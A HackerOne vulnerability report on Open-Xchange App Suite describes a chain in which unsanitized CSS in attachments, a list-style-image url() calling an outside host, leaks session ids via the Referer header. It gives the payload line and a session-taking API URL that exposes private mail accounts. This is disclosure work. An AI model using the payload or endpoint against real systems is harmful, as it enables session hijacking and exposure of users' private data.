Open-Xchange: Incomplete HTML sanitization + Session id leaking + private information disclosure

2017-01-23T09:23:04
ID H1:200487
Type hackerone
Reporter inhibitor181
Modified 2017-09-27T05:56:18

Description

Hello,

I have found a chain of events that lead to session id leaking, witch can be then used to gather private data about other added inboxes to account / login id and some other infos. Unfortunatelly (for me) I wasn't able to make a hostile account takeover because of you session id + cookie linkage.

So, these are the problems : 1. Incomplete sanitization in attachements :

li {list-style-image: url("https://www.google.com/");}

is not sanitized and google.com is called 2. The referer is passed when calling google.com 3. If the attachement is put in task, calendar or profile, the session id is passed in the url when the attachement is opened in browser. Thus, the session id is in the referer and leaked 4. The link

https://sandbox.open-xchange.com/appsuite/api/login?action=rampup&rampup=true&rampupFor=open-xchange-appsuite&session=SESSION_ID_HERE

can be called by not logged in users and reveals some sensitive data like : userid for login, uid (don't actually know the impact for this), various other data and most importantly, private email accounts and their directories

Because the video is too big (30-40Mb), I have attached it in my google drive :

█████